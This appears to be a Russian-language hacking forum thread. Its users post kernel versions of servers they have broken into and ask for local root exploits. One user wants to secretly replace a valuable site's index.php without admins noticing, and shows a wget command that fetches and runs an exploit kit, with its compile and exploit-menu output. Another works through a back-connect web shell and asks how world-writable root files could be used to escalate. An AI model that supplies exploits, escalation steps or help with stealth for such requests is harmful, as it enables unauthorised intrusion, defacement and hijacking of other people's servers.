 |
|
12.12.2013, 12:23
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
|
|
|
13.12.2013, 12:20
|
|
Новичок
Регистрация: 08.12.2013
Сообщений: 2
Провел на форуме:
744
Репутация:
0
|
|
Linux webserver 2.6.26-2-amd64 #1 SMP Thu Nov 5 02:23:12 UTC 2009 x86_64
как сделать так чтобы незаметно можно было бы поменять индекс.пхп в корне папки (на которой неудается поменять права на 0777 ) ?
Какой експлоит нужен и как именно это зделать? Переискал вес инет нигде толком нету инфы .
Netcat лучше неиспользовать так как палиться сразу админами . Сайт Миллионик нехочеться потерять .
короче : какой експлоит нужен , где скачать , как и где его запустить и зделать так чтобы было бы незаметно? )
спасибо )
|
|
|
|
13.12.2013, 12:38
|
|
Новичок
Регистрация: 08.12.2013
Сообщений: 2
Провел на форуме:
744
Репутация:
0
|
|
запустил на сервере enlightment КУДА ПИСАТь ВЫБОР СПЛОИТА? 0 , 1 , 2 ??
Код:
$ wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
Compiling exp_abacus.c...OK.
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux 2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux ------------------------------------------------------------------------------
The work of an intellectual is not to mould the political will of others; it
is, through the analyses that he does in his own field, to re-examine
evidence and assumptions, to shake up habitual ways of working and thinking,
to dissipate conventional familiarities, to re-evaluate rules and
institutions and to participate in the formation of a political will (where
he has his role as citizen to play). --Foucault
------------------------------------------------------------------------------
[+] Resolved set_fs_root to 0xffffffff802af1ee
[+] Resolved set_fs_pwd to 0xffffffff802af18e
Unable to acquire kernel symbols. Copy the appropriate System.map to the current directory.
|
|
|
|
20.12.2013, 17:49
|
|
Познающий
Регистрация: 12.07.2011
Сообщений: 53
Провел на форуме:
10175
Репутация:
0
|
|
FreeBSD 6.4-STABLE FreeBSD 6.4-STABLE #1: Wed Oct 5 16:08:37 MSD 2011
http://www.exploit-db.com/exploits/16951/
Пробьет?может кто скомпилировать?
|
|
|
|
22.12.2013, 03:44
|
|
Познающий
Регистрация: 12.07.2011
Сообщений: 53
Провел на форуме:
10175
Репутация:
0
|
|
Как компилить сплоиты если нет gcc?
|
|
|
|
22.12.2013, 06:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
goodmaer
Зависит от сплоита, если компилить удаленно, а потом портировать на уязвимую тачку и использовать, то могут потребоваться самые различные манипуляции(например, position-independent или static). Ну и разумеется, иметь схожий образ системы крайне желательно. И вообще, тот сплоит, что ты привел выше требует скомпиленное с нетграфами ядро, а это явление нечастое.
|
|
|
|
26.01.2014, 12:42
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Linux 2.6.32-39-generic #86-Ubuntu SMP Mon Feb 13 21:47:32 UTC 2012 i686
Ядру почти 2 года, но так ничего под него я и не нашел, может кто-то что-то подскажет.
|
|
|
|
15.02.2014, 20:59
|
|
Новичок
Регистрация: 25.12.2010
Сообщений: 9
Провел на форуме:
3011
Репутация:
0
|
|
Подскажите эксплойт под
Linux 2.6.32-042stab081.5 #1 SMP Mon Sep 30 16:52:24 MSK 2013 x86_64 x86_64 x86_64 GNU/Linux
|
|
|
|
16.03.2014, 08:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Дополнение - на сервере нашлось некоторое количество файлов с 0777 правами за владением root/wheel. Я попробовал заменить содержимое на банальный "sudo что-нить" и запустить, но выдает sudo: sorry, you must have a tty to run sudo (работаю под веб шеллом с back-connect, подключиться по ssh похоже что никак).
Эти файлы как-то все же могут помочь в повышении прав?
|
|
|
|
19.03.2014, 16:45
|
|
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме:
1436858
Репутация:
171
|
|
Помогите пожалуйста получить рут на этом сервере:
cat /proc/version
Сообщение от None
Linux version 2.6.32-5-openvz-amd64 (Debian 2.6.32-46) (dannf@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Sun Sep 23 11:32:18 UTC 2012
ls -la /boot
Сообщение от None
total 8
drwxr-xr-x 2 root root 4096 May 1 2012 .
drwxr-xr-x 20 root root 4096 Feb 24 15:03 ..
mount
Сообщение от None
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/simfs on / type simfs (rw,relatime)
cat /proc/sys/vm/mmap_min_addr
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
